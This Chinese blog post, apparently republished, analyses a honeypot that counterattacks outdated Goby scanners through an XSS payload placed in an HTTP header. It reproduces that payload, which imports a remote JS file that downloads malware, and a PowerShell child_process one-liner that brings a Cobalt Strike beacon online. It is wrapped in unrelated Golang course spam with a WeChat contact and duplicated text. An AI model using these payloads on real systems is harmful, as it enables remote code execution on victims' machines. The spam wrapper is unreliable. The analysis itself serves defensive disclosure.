技术分享 针对蜜罐反制Goby背后的故事(1)，泪目

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新Golang全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上Go语言开发知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip1024b （备注go）

正文

0x01 概述

近期我们联动FORadar做了一个插件，实现了从企业名称->企业漏洞的全自动检测流程，在做具体实践的时候碰到了两个很有意思的蜜罐，其中一个蜜罐内置了Weblogic漏洞，同时配置有专门针对旧版本Goby反制Payload，而另一个蜜罐则具备较强的隐蔽性，若非团队有专门研究蜜罐的人员，差点栽在这给蜜罐上，当然，这篇文章主要想聊聊第一个蜜罐，第二个有机会再单独拿出来探讨。

0x02 缘起

故事的最开始，自然是使用Goby检测到了一个WebLogic远程代码执行漏洞，准备利用此漏洞进行后续动作的时候，团队成员发现这个目标并不简单：

在返回包的头部中携带着反制Payload（IP已做脱敏处理）；

X-Powered-By: PHP/7VnMBGJWu9Uhn

显然这是一串经过HTML实体编码的代码，让我们解码看看；

X-Powered-By: PHP/7VnMBGJWu9Uhn<img src=1 οnerrοr=import(unescape(‘http://127.0.0.1:8080/VnMBGJWu9Uhn/Node.js’))>

在这个逻辑上就显而易见了，这是一个常见的XSS Payload，目的是希望执行/VnMBGJWu9Uhn/Node.js文件，那么让我们来看看这个js文件；

可以看到这是一串nodejs的利用代码，作用并不复杂，首先定义一个download函数，从远端下载文件，然后根据操作系统，来下载不同的恶意文件，如果是Windows则直接下载可执行文件，如果是MAC则下载Python3脚本文件，执行Python脚本；

那么现在问题来了，为啥这样就能反制Goby呢？这实际上是一个非常久远的历史漏洞，最早的纰漏的时间是在2021年10月，当月漏洞就已修复并发布新版本，至于漏洞为何存在，得追溯到Goby的组件识别能力，Goby使用Electron构建客户端软件，在Goby的资产界面中，会展示所有符合指纹识别规则的组件名称，比如PHP、IIS等，而为了更为精准的组件识别，Goby会从返回的数据报文中提取版本信息，并在界面渲染展示，在旧版本的Goby中并未对版本信息做无害化处理，从而导致漏洞产生。

0x03 缘起如果我用的Goby存在这个漏洞会怎样？

在达成条件之后，这个漏洞能够带来的后果非常严重，可以被反制方直接控制Goby所在的PC，但幸运的是这个漏洞并不是一个0click漏洞，需要Goby的使用人员来配合交互才能达成触发条件。

如你所见，这是正常的资产界面，以及版本信息提取结果，但可以通过构造HTTP头部的方式，来对版本信息进行调整，比如这样：

#index.php

<?php header("X-Powered-By: PHP/

此时，用户在Goby界面上看到的结果是这样的：

在界面上可以很清楚的看到反制方所使用的payload，该页面上并不会触发XSS代码，但如果此时只要点击进入IP详情界面，如下图所示，就会触发XSS代码

反制方当然可以利用此漏洞做更多的事情，可以跟上述蜜罐设备一样从远端下载恶意文件并触发执行，也可以直接调用Powershell执行ShellCode，上线CS：

index.php

<?php header("X-Powered-By: PHP/

// /js/1.js
(function(){require(‘child_process’).exec(‘powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAc…(省略)’);})();

当用户点击进入IP详情页面后，不会有任何感知，但实际上已经悄然执行powershell代码

成功上线CS

所以，尽快升级Goby到最新版本吧~~，除了自身漏洞的修复，我们也一直在推出更多好用、实用的新功能期待师傅们的体验和反馈。

0x04 还有多少个蜜罐在望眼欲穿呢？

诚如我们前文所说，这是一个已经修复近两年前的漏洞了，但是在全球范围内，仍然有着大量的蜜罐设备，再等待着某一个仍然使用旧版本Goby的好心人，我们可以使用一条FOFA语法便可以很快的找到这些目标：

header=“img” && header=“onerror”

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以添加V获取：vip1024b （备注Go）

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
o）**
[外链图片转存中…(img-iNn6RhnQ-1713221386622)]

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！